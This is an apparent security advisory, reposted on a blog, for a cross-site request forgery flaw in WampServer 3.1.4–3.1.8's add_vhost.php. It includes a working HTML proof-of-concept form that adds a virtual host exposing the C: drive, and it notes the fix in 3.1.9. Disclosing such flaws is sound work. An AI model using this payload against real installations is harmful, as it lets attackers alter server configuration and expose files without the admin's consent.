CVE-2019-11517 CSRF in Wampserver 3.1.4-3.1.8

https://www.cnblogs.com/iAmSoScArEd/

Affected product:
WampServer 3.1.4-3.1.8

Offiical description:
"WampServer is a Windows web development environment. It allows you to
create web applications with Apache2, PHP and a MySQL database.
Alongside, PhpMyAdmin allows you to manage easily your databases."

Official website:
http://www.wampserver.com/en/

Vulnerability description:
The add_vhost.php script in the administration panel of Wampserver was
vulnerable to Cross Site Request Forgery (CVE-2018-8817 -
https://www.exploit-db.com/exploits/44385) in WampServer 3.1.2 and
below.
The synchronizer pattern added as remediation was not implemented
properly, so that WampServer 3.1.3 - 3.1.8 were still vulnerable to
CSRF; attackers could abuse this flaw to get new vhosts added or
existing ones deleted in the Apache configuration file.
Technical requirement of successful exploitation is that the admin has
not opened the add_vhost.php file in the current browser serssion yet
(so the random tokens are not initialized).

Proof of concept form to expose drive c:\:

<form name="csrfWamp" method="post"
action="http://localhost/add_vhost.php?lang=english">
 <input type="text" name="vh_name" value="whatever.com">
 <textarea type="text" name="vh_folder">c:///</textarea>
 <input type="hidden" name="checkadd" value="">
 <input type="submit" name="submit" value="Start!">
</form>

Fixed WampServer version:
3.1.9

Official changelog:
http://forum.wampserver.com/read.php?2,138295,155552#msg-155552

posted @ 2019-06-11 12:42  我超怕的  阅读(391)  评论(0编辑  收藏  举报